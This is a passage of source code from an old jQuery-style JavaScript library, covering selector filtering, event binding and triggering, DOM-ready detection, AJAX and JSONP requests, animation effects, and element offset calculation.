        },
        filter: function(t, r, h) {
            var d;
            while (t && t != d) {
                d = t;
                var p = D.parse,
                    m;
                for (var i = 0; p[i]; i++) {
                    m = p[i].exec(t);
                    if (m) {
                        t = t.substring(m[0].length);
                        m[2] = m[2].replace(/\\/g, "");
                        break
                    }
                }
                if (!m) break;
                if (m[1] == ":" && m[2] == "not") r = isSimple.test(m[3]) ? D.filter(m[3], r, true).r : D(r).not(m[3]);
                else if (m[1] == ".") r = D.classFilter(r, m[2], h);
                else if (m[1] == "[") {
                    var g = [],
                        type = m[3];
                    for (var i = 0, rl = r.length; i < rl; i++) {
                        var a = r[i],
                            z = a[D.props[m[2]] || m[2]];
                        if (z == null || /href|src|selected/.test(m[2])) z = D.attr(a, m[2]) || '';
                        if ((type == "" && !! z || type == "=" && z == m[5] || type == "!=" && z != m[5] || type == "^=" && z && !z.indexOf(m[5]) || type == "$=" && z.substr(z.length - m[5].length) == m[5] || (type == "*=" || type == "~=") && z.indexOf(m[5]) >= 0) ^ h) g.push(a)
                    }
                    r = g
                } else if (m[1] == ":" && m[2] == "nth-child") {
                    var e = {},
                        g = [],
                        test = /(-?)(\d*)n((?:\+|-)?\d*)/.exec(m[3] == "even" && "2n" || m[3] == "odd" && "2n+1" || !/\D/.test(m[3]) && "0n+" + m[3] || m[3]),
                        first = (test[1] + (test[2] || 1)) - 0,
                        d = test[3] - 0;
                    for (var i = 0, rl = r.length; i < rl; i++) {
                        var j = r[i],
                            parentNode = j.parentNode,
                            id = D.data(parentNode);
                        if (!e[id]) {
                            var c = 1;
                            for (var n = parentNode.firstChild; n; n = n.nextSibling) if (n.nodeType == 1) n.nodeIndex = c++;
                            e[id] = true
                        }
                        var b = false;
                        if (first == 0) {
                            if (j.nodeIndex == d) b = true
                        } else if ((j.nodeIndex - d) % first == 0 && (j.nodeIndex - d) / first >= 0) b = true;
                        if (b ^ h) g.push(j)
                    }
                    r = g
                } else {
                    var f = D.expr[m[1]];
                    if (typeof f == "object") f = f[m[2]];
                    if (typeof f == "string") f = eval("false||function(a,i){return " + f + ";}");
                    r = D.grep(r, function(a, i) {
                        return f(a, i, m, r)
                    }, h)
                }
            }
            return {
                r: r,
                t: t
            }
        },
        dir: function(b, c) {
            var a = [],
                cur = b[c];
            while (cur && cur != document) {
                if (cur.nodeType == 1) a.push(cur);
                cur = cur[c]
            }
            return a
        },
        nth: function(a, e, c, b) {
            e = e || 1;
            var d = 0;
            for (; a; a = a[c]) if (a.nodeType == 1 && ++d == e) break;
            return a
        },
        sibling: function(n, a) {
            var r = [];
            for (; n; n = n.nextSibling) {
                if (n.nodeType == 1 && n != a) r.push(n)
            }
            return r
        }
    });
    D.event = {
        add: function(f, i, g, e) {
            if (f.nodeType == 3 || f.nodeType == 8) return;
            if (D.browser.msie && f.setInterval) f = window;
            if (!g.guid) g.guid = this.guid++;
            if (e != undefined) {
                var h = g;
                g = this.proxy(h, function() {
                    return h.apply(this, arguments)
                });
                g.data = e
            }
            var j = D.data(f, "events") || D.data(f, "events", {}),
                handle = D.data(f, "handle") || D.data(f, "handle", function() {
                    if (typeof D != "undefined" && !D.event.triggered) return D.event.handle.apply(arguments.callee.elem, arguments)
                });
            handle.elem = f;
            D.each(i.split(/\s+/), function(c, b) {
                var a = b.split(".");
                b = a[0];
                g.type = a[1];
                var d = j[b];
                if (!d) {
                    d = j[b] = {};
                    if (!D.event.special[b] || D.event.special[b].setup.call(f) === false) {
                        if (f.addEventListener) f.addEventListener(b, handle, false);
                        else if (f.attachEvent) f.attachEvent("on" + b, handle)
                    }
                }
                d[g.guid] = g;
                D.event.global[b] = true
            });
            f = null
        },
        guid: 1,
        global: {},
        remove: function(e, h, f) {
            if (e.nodeType == 3 || e.nodeType == 8) return;
            var i = D.data(e, "events"),
                ret, index;
            if (i) {
                if (h == undefined || (typeof h == "string" && h.charAt(0) == ".")) for (var g in i) this.remove(e, g + (h || ""));
                else {
                    if (h.type) {
                        f = h.handler;
                        h = h.type
                    }
                    D.each(h.split(/\s+/), function(b, a) {
                        var c = a.split(".");
                        a = c[0];
                        if (i[a]) {
                            if (f) delete i[a][f.guid];
                            else for (f in i[a]) if (!c[1] || i[a][f].type == c[1]) delete i[a][f];
                            for (ret in i[a]) break;
                            if (!ret) {
                                if (!D.event.special[a] || D.event.special[a].teardown.call(e) === false) {
                                    if (e.removeEventListener) e.removeEventListener(a, D.data(e, "handle"), false);
                                    else if (e.detachEvent) e.detachEvent("on" + a, D.data(e, "handle"))
                                }
                                ret = null;
                                delete i[a]
                            }
                        }
                    })
                }
                for (ret in i) break;
                if (!ret) {
                    var d = D.data(e, "handle");
                    if (d) d.elem = null;
                    D.removeData(e, "events");
                    D.removeData(e, "handle")
                }
            }
        },
        trigger: function(h, c, f, g, i) {
            c = D.makeArray(c);
            if (h.indexOf("!") >= 0) {
                h = h.slice(0, -1);
                var a = true
            }
            if (!f) {
                if (this.global[h]) D("*").add([window, document]).trigger(h, c)
            } else {
                if (f.nodeType == 3 || f.nodeType == 8) return undefined;
                var b, ret, fn = D.isFunction(f[h] || null),
                    event = !c[0] || !c[0].preventDefault;
                if (event) {
                    c.unshift({
                        type: h,
                        target: f,
                        preventDefault: function() {},
                        stopPropagation: function() {},
                        timeStamp: now()
                    });
                    c[0][E] = true
                }
                c[0].type = h;
                if (a) c[0].exclusive = true;
                var d = D.data(f, "handle");
                if (d) b = d.apply(f, c);
                if ((!fn || (D.nodeName(f, 'a') && h == "click")) && f["on" + h] && f["on" + h].apply(f, c) === false) b = false;
                if (event) c.shift();
                if (i && D.isFunction(i)) {
                    ret = i.apply(f, b == null ? c : c.concat(b));
                    if (ret !== undefined) b = ret
                }
                if (fn && g !== false && b !== false && !(D.nodeName(f, 'a') && h == "click")) {
                    this.triggered = true;
                    try {
                        f[h]()
                    } catch (e) {}
                }
                this.triggered = false
            }
            return b
        },
        handle: function(b) {
            var a, ret, namespace, all, handlers;
            b = arguments[0] = D.event.fix(b || window.event);
            namespace = b.type.split(".");
            b.type = namespace[0];
            namespace = namespace[1];
            all = !namespace && !b.exclusive;
            handlers = (D.data(this, "events") || {})[b.type];
            for (var j in handlers) {
                var c = handlers[j];
                if (all || c.type == namespace) {
                    b.handler = c;
                    b.data = c.data;
                    ret = c.apply(this, arguments);
                    if (a !== false) a = ret;
                    if (ret === false) {
                        b.preventDefault();
                        b.stopPropagation()
                    }
                }
            }
            return a
        },
        fix: function(b) {
            if (b[E] == true) return b;
            var d = b;
            b = {
                originalEvent: d
            };
            var c = "altKey attrChange attrName bubbles button cancelable charCode clientX clientY ctrlKey currentTarget data detail eventPhase fromElement handler keyCode metaKey newValue originalTarget pageX pageY prevValue relatedNode relatedTarget screenX screenY shiftKey srcElement target timeStamp toElement type view wheelDelta which".split(" ");
            for (var i = c.length; i; i--) b[c[i]] = d[c[i]];
            b[E] = true;
            b.preventDefault = function() {
                if (d.preventDefault) d.preventDefault();
                d.returnValue = false
            };
            b.stopPropagation = function() {
                if (d.stopPropagation) d.stopPropagation();
                d.cancelBubble = true
            };
            b.timeStamp = b.timeStamp || now();
            if (!b.target) b.target = b.srcElement || document;
            if (b.target.nodeType == 3) b.target = b.target.parentNode;
            if (!b.relatedTarget && b.fromElement) b.relatedTarget = b.fromElement == b.target ? b.toElement : b.fromElement;
            if (b.pageX == null && b.clientX != null) {
                var a = document.documentElement,
                    body = document.body;
                b.pageX = b.clientX + (a && a.scrollLeft || body && body.scrollLeft || 0) - (a.clientLeft || 0);
                b.pageY = b.clientY + (a && a.scrollTop || body && body.scrollTop || 0) - (a.clientTop || 0)
            }
            if (!b.which && ((b.charCode || b.charCode === 0) ? b.charCode : b.keyCode)) b.which = b.charCode || b.keyCode;
            if (!b.metaKey && b.ctrlKey) b.metaKey = b.ctrlKey;
            if (!b.which && b.button) b.which = (b.button & 1 ? 1 : (b.button & 2 ? 3 : (b.button & 4 ? 2 : 0)));
            return b
        },
        proxy: function(a, b) {
            b.guid = a.guid = a.guid || b.guid || this.guid++;
            return b
        },
        special: {
            ready: {
                setup: function() {
                    bindReady();
                    return
                },
                teardown: function() {
                    return
                }
            },
            mouseenter: {
                setup: function() {
                    if (D.browser.msie) return false;
                    D(this).bind("mouseover", D.event.special.mouseenter.handler);
                    return true
                },
                teardown: function() {
                    if (D.browser.msie) return false;
                    D(this).unbind("mouseover", D.event.special.mouseenter.handler);
                    return true
                },
                handler: function(a) {
                    if (F(a, this)) return true;
                    a.type = "mouseenter";
                    return D.event.handle.apply(this, arguments)
                }
            },
            mouseleave: {
                setup: function() {
                    if (D.browser.msie) return false;
                    D(this).bind("mouseout", D.event.special.mouseleave.handler);
                    return true
                },
                teardown: function() {
                    if (D.browser.msie) return false;
                    D(this).unbind("mouseout", D.event.special.mouseleave.handler);
                    return true
                },
                handler: function(a) {
                    if (F(a, this)) return true;
                    a.type = "mouseleave";
                    return D.event.handle.apply(this, arguments)
                }
            }
        }
    };
    D.fn.extend({
        bind: function(c, a, b) {
            return c == "unload" ? this.one(c, a, b) : this.each(function() {
                D.event.add(this, c, b || a, b && a)
            })
        },
        one: function(d, b, c) {
            var e = D.event.proxy(c || b, function(a) {
                D(this).unbind(a, e);
                return (c || b).apply(this, arguments)
            });
            return this.each(function() {
                D.event.add(this, d, e, c && b)
            })
        },
        unbind: function(a, b) {
            return this.each(function() {
                D.event.remove(this, a, b)
            })
        },
        trigger: function(c, a, b) {
            return this.each(function() {
                D.event.trigger(c, a, this, true, b)
            })
        },
        triggerHandler: function(c, a, b) {
            return this[0] && D.event.trigger(c, a, this[0], false, b)
        },
        toggle: function(b) {
            var c = arguments,
                i = 1;
            while (i < c.length) D.event.proxy(b, c[i++]);
            return this.click(D.event.proxy(b, function(a) {
                this.lastToggle = (this.lastToggle || 0) % i;
                a.preventDefault();
                return c[this.lastToggle++].apply(this, arguments) || false
            }))
        },
        hover: function(a, b) {
            return this.bind('mouseenter', a).bind('mouseleave', b)
        },
        ready: function(a) {
            bindReady();
            if (D.isReady) a.call(document, D);
            else D.readyList.push(function() {
                return a.call(this, D)
            });
            return this
        }
    });
    D.extend({
        isReady: false,
        readyList: [],
        ready: function() {
            if (!D.isReady) {
                D.isReady = true;
                if (D.readyList) {
                    D.each(D.readyList, function() {
                        this.call(document)
                    });
                    D.readyList = null
                }
                D(document).triggerHandler("ready")
            }
        }
    });
    var x = false;

    function bindReady() {
        if (x) return;
        x = true;
        if (document.addEventListener && !D.browser.opera) document.addEventListener("DOMContentLoaded", D.ready, false);
        if (D.browser.msie && window == top)(function() {
            if (D.isReady) return;
            try {
                document.documentElement.doScroll("left")
            } catch (error) {
                setTimeout(arguments.callee, 0);
                return
            }
            D.ready()
        })();
        if (D.browser.opera) document.addEventListener("DOMContentLoaded", function() {
            if (D.isReady) return;
            for (var i = 0; i < document.styleSheets.length; i++) if (document.styleSheets[i].disabled) {
                setTimeout(arguments.callee, 0);
                return
            }
            D.ready()
        }, false);
        if (D.browser.safari) {
            var a;
            (function() {
                if (D.isReady) return;
                if (document.readyState != "loaded" && document.readyState != "complete") {
                    setTimeout(arguments.callee, 0);
                    return
                }
                if (a === undefined) a = D("style, link[rel=stylesheet]").length;
                if (document.styleSheets.length != a) {
                    setTimeout(arguments.callee, 0);
                    return
                }
                D.ready()
            })()
        }
        D.event.add(window, "load", D.ready)
    }
    D.each(("blur,focus,load,resize,scroll,unload,click,dblclick," + "mousedown,mouseup,mousemove,mouseover,mouseout,change,select," + "submit,keydown,keypress,keyup,error").split(","), function(i, b) {
        D.fn[b] = function(a) {
            return a ? this.bind(b, a) : this.trigger(b)
        }
    });
    var F = function(a, c) {
            var b = a.relatedTarget;
            while (b && b != c) try {
                b = b.parentNode
            } catch (error) {
                b = c
            }
            return b == c
        };
    D(window).bind("unload", function() {
        D("*").add(document).unbind()
    });
    D.fn.extend({
        _load: D.fn.load,
        load: function(g, d, c) {
            if (typeof g != 'string') return this._load(g);
            var e = g.indexOf(" ");
            if (e >= 0) {
                var i = g.slice(e, g.length);
                g = g.slice(0, e)
            }
            c = c ||
            function() {};
            var f = "GET";
            if (d) if (D.isFunction(d)) {
                c = d;
                d = null
            } else {
                d = D.param(d);
                f = "POST"
            }
            var h = this;
            D.ajax({
                url: g,
                type: f,
                dataType: "html",
                data: d,
                complete: function(a, b) {
                    if (b == "success" || b == "notmodified") h.html(i ? D("<div/>").append(a.responseText.replace(/<script(.|\s)*?\/script>/g, "")).find(i) : a.responseText);
                    h.each(c, [a.responseText, b, a])
                }
            });
            return this
        },
        serialize: function() {
            return D.param(this.serializeArray())
        },
        serializeArray: function() {
            return this.map(function() {
                return D.nodeName(this, "form") ? D.makeArray(this.elements) : this
            }).filter(function() {
                return this.name && !this.disabled && (this.checked || /select|textarea/i.test(this.nodeName) || /text|hidden|password/i.test(this.type))
            }).map(function(i, c) {
                var b = D(this).val();
                return b == null ? null : b.constructor == Array ? D.map(b, function(a, i) {
                    return {
                        name: c.name,
                        value: a
                    }
                }) : {
                    name: c.name,
                    value: b
                }
            }).get()
        }
    });
    D.each("ajaxStart,ajaxStop,ajaxComplete,ajaxError,ajaxSuccess,ajaxSend".split(","), function(i, o) {
        D.fn[o] = function(f) {
            return this.bind(o, f)
        }
    });
    var B = now();
    D.extend({
        get: function(d, b, a, c) {
            if (D.isFunction(b)) {
                a = b;
                b = null
            }
            return D.ajax({
                type: "GET",
                url: d,
                data: b,
                success: a,
                dataType: c
            })
        },
        getScript: function(b, a) {
            return D.get(b, null, a, "script")
        },
        getJSON: function(c, b, a) {
            return D.get(c, b, a, "json")
        },
        post: function(d, b, a, c) {
            if (D.isFunction(b)) {
                a = b;
                b = {}
            }
            return D.ajax({
                type: "POST",
                url: d,
                data: b,
                success: a,
                dataType: c
            })
        },
        ajaxSetup: function(a) {
            D.extend(D.ajaxSettings, a)
        },
        ajaxSettings: {
            url: location.href,
            global: true,
            type: "GET",
            timeout: 0,
            contentType: "application/x-www-form-urlencoded",
            processData: true,
            async: true,
            data: null,
            username: null,
            password: null,
            accepts: {
                xml: "application/xml, text/xml",
                html: "text/html",
                script: "text/javascript, application/javascript",
                json: "application/json, text/javascript",
                text: "text/plain",
                _default: "*/*"
            }
        },
        lastModified: {},
        ajax: function(s) {
            s = D.extend(true, s, D.extend(true, {}, D.ajaxSettings, s));
            var g, jsre = /=\?(&|$)/g,
                status, data, type = s.type.toUpperCase();
            if (s.data && s.processData && typeof s.data != "string") s.data = D.param(s.data);
            if (s.dataType == "jsonp") {
                if (type == "GET") {
                    if (!s.url.match(jsre)) s.url += (s.url.match(/\?/) ? "&" : "?") + (s.jsonp || "callback") + "=?"
                } else if (!s.data || !s.data.match(jsre)) s.data = (s.data ? s.data + "&" : "") + (s.jsonp || "callback") + "=?";
                s.dataType = "json"
            }
            if (s.dataType == "json" && (s.data && s.data.match(jsre) || s.url.match(jsre))) {
                g = "jsonp" + B++;
                if (s.data) s.data = (s.data + "").replace(jsre, "=" + g + "$1");
                s.url = s.url.replace(jsre, "=" + g + "$1");
                s.dataType = "script";
                window[g] = function(a) {
                    data = a;
                    success();
                    complete();
                    window[g] = undefined;
                    try {
                        delete window[g]
                    } catch (e) {}
                    if (i) i.removeChild(h)
                }
            }
            if (s.dataType == "script" && s.cache == null) s.cache = false;
            if (s.cache === false && type == "GET") {
                var j = now();
                var k = s.url.replace(/(\?|&)_=.*?(&|$)/, "$1_=" + j + "$2");
                s.url = k + ((k == s.url) ? (s.url.match(/\?/) ? "&" : "?") + "_=" + j : "")
            }
            if (s.data && type == "GET") {
                s.url += (s.url.match(/\?/) ? "&" : "?") + s.data;
                s.data = null
            }
            if (s.global && !D.active++) D.event.trigger("ajaxStart");
            var n = /^(?:\w+:)?\/\/([^\/?#]+)/;
            if (s.dataType == "script" && type == "GET" && n.test(s.url) && n.exec(s.url)[1] != location.host) {
                var i = document.getElementsByTagName("head")[0];
                var h = document.createElement("script");
                h.src = s.url;
                if (s.scriptCharset) h.charset = s.scriptCharset;
                if (!g) {
                    var l = false;
                    h.onload = h.onreadystatechange = function() {
                        if (!l && (!this.readyState || this.readyState == "loaded" || this.readyState == "complete")) {
                            l = true;
                            success();
                            complete();
                            i.removeChild(h)
                        }
                    }
                }
                i.appendChild(h);
                return undefined
            }
            var m = false;
            var c = window.ActiveXObject ? new ActiveXObject("Microsoft.XMLHTTP") : new XMLHttpRequest();
            if (s.username) c.open(type, s.url, s.async, s.username, s.password);
            else c.open(type, s.url, s.async);
            try {
                if (s.data) c.setRequestHeader("Content-Type", s.contentType);
                if (s.ifModified) c.setRequestHeader("If-Modified-Since", D.lastModified[s.url] || "Thu, 01 Jan 1970 00:00:00 GMT");
                c.setRequestHeader("X-Requested-With", "XMLHttpRequest");
                c.setRequestHeader("Accept", s.dataType && s.accepts[s.dataType] ? s.accepts[s.dataType] + ", */*" : s.accepts._default)
            } catch (e) {}
            if (s.beforeSend && s.beforeSend(c, s) === false) {
                s.global && D.active--;
                c.abort();
                return false
            }
            if (s.global) D.event.trigger("ajaxSend", [c, s]);
            var d = function(a) {
                    if (!m && c && (c.readyState == 4 || a == "timeout")) {
                        m = true;
                        if (f) {
                            clearInterval(f);
                            f = null
                        }
                        status = a == "timeout" && "timeout" || !D.httpSuccess(c) && "error" || s.ifModified && D.httpNotModified(c, s.url) && "notmodified" || "success";
                        if (status == "success") {
                            try {
                                data = D.httpData(c, s.dataType, s.dataFilter)
                            } catch (e) {
                                status = "parsererror"
                            }
                        }
                        if (status == "success") {
                            var b;
                            try {
                                b = c.getResponseHeader("Last-Modified")
                            } catch (e) {}
                            if (s.ifModified && b) D.lastModified[s.url] = b;
                            if (!g) success()
                        } else D.handleError(s, c, status);
                        complete();
                        if (s.async) c = null
                    }
                };
            if (s.async) {
                var f = setInterval(d, 13);
                if (s.timeout > 0) setTimeout(function() {
                    if (c) {
                        c.abort();
                        if (!m) d("timeout")
                    }
                }, s.timeout)
            }
            try {
                c.send(s.data)
            } catch (e) {
                D.handleError(s, c, null, e)
            }
            if (!s.async) d();

            function success() {
                if (s.success) s.success(data, status);
                if (s.global) D.event.trigger("ajaxSuccess", [c, s])
            }
            function complete() {
                if (s.complete) s.complete(c, status);
                if (s.global) D.event.trigger("ajaxComplete", [c, s]);
                if (s.global && !--D.active) D.event.trigger("ajaxStop")
            }
            return c
        },
        handleError: function(s, a, b, e) {
            if (s.error) s.error(a, b, e);
            if (s.global) D.event.trigger("ajaxError", [a, s, e])
        },
        active: 0,
        httpSuccess: function(a) {
            try {
                return !a.status && location.protocol == "file:" || (a.status >= 200 && a.status < 300) || a.status == 304 || a.status == 1223 || D.browser.safari && a.status == undefined
            } catch (e) {}
            return false
        },
        httpNotModified: function(a, c) {
            try {
                var b = a.getResponseHeader("Last-Modified");
                return a.status == 304 || b == D.lastModified[c] || D.browser.safari && a.status == undefined
            } catch (e) {}
            return false
        },
        httpData: function(a, c, b) {
            var d = a.getResponseHeader("content-type"),
                xml = c == "xml" || !c && d && d.indexOf("xml") >= 0,
                data = xml ? a.responseXML : a.responseText;
            if (xml && data.documentElement.tagName == "parsererror") throw "parsererror";
            if (b) data = b(data, c);
            if (c == "script") D.globalEval(data);
            if (c == "json") data = eval("(" + data + ")");
            return data
        },
        param: function(a) {
            var s = [];
            if (a.constructor == Array || a.jquery) D.each(a, function() {
                s.push(encodeURIComponent(this.name) + "=" + encodeURIComponent(this.value))
            });
            else for (var j in a) if (a[j] && a[j].constructor == Array) D.each(a[j], function() {
                s.push(encodeURIComponent(j) + "=" + encodeURIComponent(this))
            });
            else s.push(encodeURIComponent(j) + "=" + encodeURIComponent(D.isFunction(a[j]) ? a[j]() : a[j]));
            return s.join("&").replace(/%20/g, "+")
        }
    });
    D.fn.extend({
        show: function(c, b) {
            return c ? this.animate({
                height: "show",
                width: "show",
                opacity: "show"
            }, c, b) : this.filter(":hidden").each(function() {
                this.style.display = this.oldblock || "";
                if (D.css(this, "display") == "none") {
                    var a = D("<" + this.tagName + " />").appendTo("body");
                    this.style.display = a.css("display");
                    if (this.style.display == "none") this.style.display = "block";
                    a.remove()
                }
            }).end()
        },
        hide: function(b, a) {
            return b ? this.animate({
                height: "hide",
                width: "hide",
                opacity: "hide"
            }, b, a) : this.filter(":visible").each(function() {
                this.oldblock = this.oldblock || D.css(this, "display");
                this.style.display = "none"
            }).end()
        },
        _toggle: D.fn.toggle,
        toggle: function(a, b) {
            return D.isFunction(a) && D.isFunction(b) ? this._toggle.apply(this, arguments) : a ? this.animate({
                height: "toggle",
                width: "toggle",
                opacity: "toggle"
            }, a, b) : this.each(function() {
                D(this)[D(this).is(":hidden") ? "show" : "hide"]()
            })
        },
        slideDown: function(b, a) {
            return this.animate({
                height: "show"
            }, b, a)
        },
        slideUp: function(b, a) {
            return this.animate({
                height: "hide"
            }, b, a)
        },
        slideToggle: function(b, a) {
            return this.animate({
                height: "toggle"
            }, b, a)
        },
        fadeIn: function(b, a) {
            return this.animate({
                opacity: "show"
            }, b, a)
        },
        fadeOut: function(b, a) {
            return this.animate({
                opacity: "hide"
            }, b, a)
        },
        fadeTo: function(c, a, b) {
            return this.animate({
                opacity: a
            }, c, b)
        },
        animate: function(k, j, i, g) {
            var h = D.speed(j, i, g);
            return this[h.queue === false ? "each" : "queue"](function() {
                if (this.nodeType != 1) return false;
                var f = D.extend({}, h),
                    p, hidden = D(this).is(":hidden"),
                    self = this;
                for (p in k) {
                    if (k[p] == "hide" && hidden || k[p] == "show" && !hidden) return f.complete.call(this);
                    if (p == "height" || p == "width") {
                        f.display = D.css(this, "display");
                        f.overflow = this.style.overflow
                    }
                }
                if (f.overflow != null) this.style.overflow = "hidden";
                f.curAnim = D.extend({}, k);
                D.each(k, function(c, a) {
                    var e = new D.fx(self, f, c);
                    if (/toggle|show|hide/.test(a)) e[a == "toggle" ? hidden ? "show" : "hide" : a](k);
                    else {
                        var b = a.toString().match(/^([+-]=)?([\d+-.]+)(.*)$/),
                            start = e.cur(true) || 0;
                        if (b) {
                            var d = parseFloat(b[2]),
                                unit = b[3] || "px";
                            if (unit != "px") {
                                self.style[c] = (d || 1) + unit;
                                start = ((d || 1) / e.cur(true)) * start;
                                self.style[c] = start + unit
                            }
                            if (b[1]) d = ((b[1] == "-=" ? -1 : 1) * d) + start;
                            e.custom(start, d, unit)
                        } else e.custom(start, a, "")
                    }
                });
                return true
            })
        },
        queue: function(a, b) {
            if (D.isFunction(a) || (a && a.constructor == Array)) {
                b = a;
                a = "fx"
            }
            if (!a || (typeof a == "string" && !b)) return A(this[0], a);
            return this.each(function() {
                if (b.constructor == Array) A(this, a, b);
                else {
                    A(this, a).push(b);
                    if (A(this, a).length == 1) b.call(this)
                }
            })
        },
        stop: function(b, c) {
            var a = D.timers;
            if (b) this.queue([]);
            this.each(function() {
                for (var i = a.length - 1; i >= 0; i--) if (a[i].elem == this) {
                    if (c) a[i](true);
                    a.splice(i, 1)
                }
            });
            if (!c) this.dequeue();
            return this
        }
    });
    var A = function(b, c, a) {
            if (b) {
                c = c || "fx";
                var q = D.data(b, c + "queue");
                if (!q || a) q = D.data(b, c + "queue", D.makeArray(a))
            }
            return q
        };
    D.fn.dequeue = function(a) {
        a = a || "fx";
        return this.each(function() {
            var q = A(this, a);
            q.shift();
            if (q.length) q[0].call(this)
        })
    };
    D.extend({
        speed: function(b, a, c) {
            var d = b && b.constructor == Object ? b : {
                complete: c || !c && a || D.isFunction(b) && b,
                duration: b,
                easing: c && a || a && a.constructor != Function && a
            };
            d.duration = (d.duration && d.duration.constructor == Number ? d.duration : D.fx.speeds[d.duration]) || D.fx.speeds.def;
            d.old = d.complete;
            d.complete = function() {
                if (d.queue !== false) D(this).dequeue();
                if (D.isFunction(d.old)) d.old.call(this)
            };
            return d
        },
        easing: {
            linear: function(p, n, b, a) {
                return b + a * p
            },
            swing: function(p, n, b, a) {
                return ((-Math.cos(p * Math.PI) / 2) + 0.5) * a + b
            }
        },
        timers: [],
        timerId: null,
        fx: function(b, c, a) {
            this.options = c;
            this.elem = b;
            this.prop = a;
            if (!c.orig) c.orig = {}
        }
    });
    D.fx.prototype = {
        update: function() {
            if (this.options.step) this.options.step.call(this.elem, this.now, this);
            (D.fx.step[this.prop] || D.fx.step._default)(this);
            if (this.prop == "height" || this.prop == "width") this.elem.style.display = "block"
        },
        cur: function(a) {
            if (this.elem[this.prop] != null && this.elem.style[this.prop] == null) return this.elem[this.prop];
            var r = parseFloat(D.css(this.elem, this.prop, a));
            return r && r > -10000 ? r : parseFloat(D.curCSS(this.elem, this.prop)) || 0
        },
        custom: function(c, b, d) {
            this.startTime = now();
            this.start = c;
            this.end = b;
            this.unit = d || this.unit || "px";
            this.now = this.start;
            this.pos = this.state = 0;
            this.update();
            var e = this;

            function t(a) {
                return e.step(a)
            }
            t.elem = this.elem;
            D.timers.push(t);
            if (D.timerId == null) {
                D.timerId = setInterval(function() {
                    var a = D.timers;
                    for (var i = 0; i < a.length; i++) if (!a[i]()) a.splice(i--, 1);
                    if (!a.length) {
                        clearInterval(D.timerId);
                        D.timerId = null
                    }
                }, 13)
            }
        },
        show: function() {
            this.options.orig[this.prop] = D.attr(this.elem.style, this.prop);
            this.options.show = true;
            this.custom(0, this.cur());
            if (this.prop == "width" || this.prop == "height") this.elem.style[this.prop] = "1px";
            D(this.elem).show()
        },
        hide: function() {
            this.options.orig[this.prop] = D.attr(this.elem.style, this.prop);
            this.options.hide = true;
            this.custom(this.cur(), 0)
        },
        step: function(a) {
            var t = now();
            if (a || t > this.options.duration + this.startTime) {
                this.now = this.end;
                this.pos = this.state = 1;
                this.update();
                this.options.curAnim[this.prop] = true;
                var b = true;
                for (var i in this.options.curAnim) if (this.options.curAnim[i] !== true) b = false;
                if (b) {
                    if (this.options.display != null) {
                        this.elem.style.overflow = this.options.overflow;
                        this.elem.style.display = this.options.display;
                        if (D.css(this.elem, "display") == "none") this.elem.style.display = "block"
                    }
                    if (this.options.hide) this.elem.style.display = "none";
                    if (this.options.hide || this.options.show) for (var p in this.options.curAnim) D.attr(this.elem.style, p, this.options.orig[p])
                }
                if (b) this.options.complete.call(this.elem);
                return false
            } else {
                var n = t - this.startTime;
                this.state = n / this.options.duration;
                this.pos = D.easing[this.options.easing || (D.easing.swing ? "swing" : "linear")](this.state, n, 0, 1, this.options.duration);
                this.now = this.start + ((this.end - this.start) * this.pos);
                this.update()
            }
            return true
        }
    };
    D.extend(D.fx, {
        speeds: {
            slow: 600,
            fast: 200,
            def: 400
        },
        step: {
            scrollLeft: function(a) {
                a.elem.scrollLeft = a.now
            },
            scrollTop: function(a) {
                a.elem.scrollTop = a.now
            },
            opacity: function(a) {
                D.attr(a.elem.style, "opacity", a.now)
            },
            _default: function(a) {
                a.elem.style[a.prop] = a.now + a.unit
            }
        }
    });
    D.fn.offset = function() {
        var b = 0,
            top = 0,
            elem = this[0],
            results;
        if (elem) with(D.browser) {
            var d = elem.parentNode,
                offsetChild = elem,
                offsetParent = elem.offsetParent,
                doc = elem.ownerDocument,
                safari2 = safari && parseInt(version) < 522 && !/adobeair/i.test(v),
                css = D.curCSS,
                fixed = css(elem, "position") == "fixed";
            if (elem.getBoundingClientRect) {
                var c = elem.getBoundingClientRect();
                add(c.left + Math.max(doc.documentElement.scrollLeft, doc.body.scrollLeft), c.top + Math.max(doc.documentElement.scrollTop, doc.body.scrollTop));
                add(-doc.documentElement.clientLeft, -doc.documentElement.clientTop)
            } else {
                add(elem.offsetLeft, elem.offsetTop);
                while (offsetParent) {
                    add(offsetParent.offsetLeft, offsetParent.offsetTop);
                    if (mozilla && !/^t(able|d|h)$/i.test(offsetParent.tagName) || safari && !safari2) border(offsetParent);
                    if (!fixed && css(offsetParent, "position") == "fixed") fixed = true;
                    offsetChild = /^body$/i.test(offsetParent.tagName) ? offsetChild : offsetParent;
                    offsetParent = offsetParent.offsetParent
                }
                while (d && d.tagName && !/^body|html$/i.test(d.tagName)) {
                    if (!/^inline|table.*$/i.test(css(d, "display"))) add(-d.scrollLeft, -d.scrollTop);
                    if (mozilla && css(d, "overflow") != "visible") border(d);
                    d = d.parentNode
                }
                if ((safari2 && (fixed || css(offsetChild, "position") == "absolute")) || (mozilla && css(offsetChild, "position") != "absolute")) add(-doc.body.offsetLeft, -doc.body.offsetTop);
                if (fixed) add(Math.max(doc.documentElement.scrollLeft, doc.body.scrollLeft), Math.max(doc.documentElement.scrollTop, doc.body.scrollTop))
            }
            results = {
                top: top,
                left: b
            }
        }
        function border(a) {
            add(D.curCSS(a, "borderLeftWidth", true), D.curCSS(a, "borderTopWidth", true))
        }
        function add(l, t) {
            b += parseInt(l, 10) || 0;
            top += parseInt(t, 10) || 0
        }
        return results
    };
    D.fn.extend({
        position: function() {
            var a = 0,
                top = 0,
                results;
            if (this[0]) {
                var b = this.offsetParent(),
                    offset = this.offset(),
                    parentOffset = /^body|html$/i.test(b[0].tagName) ? {
                        top: 0,
                        left: 0
                    } : b.offset();
                offset.top -= num(this, 'marginTop');
                offset.left -= num(this, 'marginLeft');
                parentOffset.top += num(b, 'borderTopWidth');
                parentOffset.left += num(b, 'borderLeftWidth');
                results = {
                    top: offset.top - parentOffset.top,
                    left: offset.left - parentOffset.left
                }
            }
            return results
        },
        offsetParent: function() {
            var a = this[0].offsetParent;
            while (a && (!/^body|html$/i.test(a.tagName) && D.css(a, 'position') == 'static')) a = a.offsetParent;
            return D(a)
        }
    });
    D.each(['Left', 'Top'], function(i, b) {
        var c = 'scroll' + b;
        D.fn[c] = function(a) {
            if (!this[0]) return;
            return a != undefined ? this.each(function() {
                this == window || this == document ? window.scrollTo(!i ? a : D(window).scrollLeft(), i ? a : D(window).scrollTop()) : this[c] = a
